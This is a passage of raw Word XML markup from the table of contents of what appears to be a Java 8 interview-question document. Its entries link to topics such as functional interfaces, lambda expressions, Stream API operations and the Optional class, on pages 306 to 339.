              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>306</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="682CF332" w14:textId="3E256C0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9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y we need Functional Interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307695 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>307</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F7AC598" w14:textId="5C2DB11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9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normal interface and Functional Interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307696 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>309</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43FB186F" w14:textId="11C75B3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9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default method in functional interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307697 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>311</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12E5275B" w14:textId="36EDA15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9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Lambda Expression?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307698 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>313</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C23770B" w14:textId="5DAF94B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69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prerequisite for Lambda Expression?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307699 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>314</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="779AC88B" w14:textId="3D04E2B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0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map function in stream?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307700 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>316</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="080C7DE7" w14:textId="6F41ABE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0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filter in the stream?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307701 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>317</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6246AEB4" w14:textId="159546F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0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Stream API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307702 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>319</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CA91A8A" w14:textId="47346C1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0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use of @FunctionalInterface annotation? Will it be checked manually or by the compiler?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307703 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>321</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E6BF03C" w14:textId="785DF07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0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Map and FlatMap in stream?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307704 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>322</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DEBE7F1" w14:textId="632B311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0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Map and Filter in java 8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307705 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>323</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E2DE098" w14:textId="2EB6D2C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0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intermediate and terminal operator in Java stream API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307706 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>324</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="010DEB1C" w14:textId="3193080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0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Advantages of Stream over for loop?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307707 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E013404" w14:textId="0E02251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0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lambda expression in java 8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307708 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>328</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F3542B0" w14:textId="0600F59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0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use lambda expressions with one example?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307709 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>329</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="194C38FD" w14:textId="1CC3BE4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1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Stream and Parallel stream?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307710 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>330</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C32F204" w14:textId="48EFBE0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1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Optional class in java 8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307711 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>332</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="697B4E74" w14:textId="682C470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1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are the advantages of using Optional class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307712 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>333</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A7DB186" w14:textId="1B3A847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1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purpose of Optional class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307713 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>334</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0310456A" w14:textId="0C31505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1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Java 8 Functional interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307714 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>335</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22439DEB" w14:textId="461E558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1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ere can you use FlatMap in a stream?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307715 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>336</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="170E12DF" w14:textId="42B02C3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1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use map method in java 8 stream?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307716 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>336</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11F6BEF8" w14:textId="6B5DA47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1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sort the list of objects in java using Stream API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307717 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>338</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4208EE49" w14:textId="64B0D37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1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inbuilt functional interface in Java 8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307718 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>338</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BAA3737" w14:textId="0537397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1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Predicate and Consumer in java 8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307719 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>339</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C152ADE" w14:textId="0AED419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2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Predicate and Function?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
